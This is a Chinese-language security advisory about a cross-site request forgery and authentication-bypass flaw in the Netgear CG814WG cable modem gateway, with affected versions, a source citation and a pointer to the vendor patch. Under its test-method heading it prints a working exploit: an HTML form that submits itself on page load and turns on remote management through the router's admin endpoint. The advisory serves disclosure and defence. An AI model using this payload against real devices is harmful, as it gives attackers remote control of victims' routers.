安全研究

安全漏洞
NETGEAR Wireless Cable Modem Gateway跨站请求伪造和安全限制绕过漏洞

发布日期:2011-09-20
更新日期:2011-09-20

受影响系统:
Netgear Wireless Cable Modem Gateway CG814WG 3.9.26 R14
不受影响系统:
Netgear Wireless Cable Modem Gateway CG814WG 3.9.26 R15
描述:
BUGTRAQ  ID: 49692

NETGEAR Wireless Cable Modem Gateway CG814WG是由ISP提供的无线路由器。

NETGEAR Wireless Cable Modem Gateway CG814WG在身份验证机制的实现上存在跨站请求伪造和安全限制绕过漏洞,远程攻击者可利用这些漏洞执行管理员操作,绕过安全限制,访问受影响设备或删除某些数据。

不用发送任何身份验证标头,只要发送有效的POST请求到受影响设备,即可绕过基本的身份验证。另外,Web应用中缺少CSRF保护,结合绕过攻击可启用远程管理界面,重置管理密码。

<*来源:Sense of Security Labs
  
  链接:http://www.senseofsecurity.com.au/advisories/SOS-11-011.pdf
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<html>
<head></head>
<body onLoad=javascript:document.form.submit()>
<form action="http://192.168.0.1/goform/RgRemoteManagement"
method="POST" name="form">
<input type="hidden" name="NetgearRmEnable" value="0x01">
<input type="hidden" name="NetgearRmPortNumber" value="1337">
<input type="hidden" name="NetgearUserLevel" value="1">
</form>
</body>
</html>

建议:
厂商补丁:

Netgear
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.netgear.com/

浏览次数:2471
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障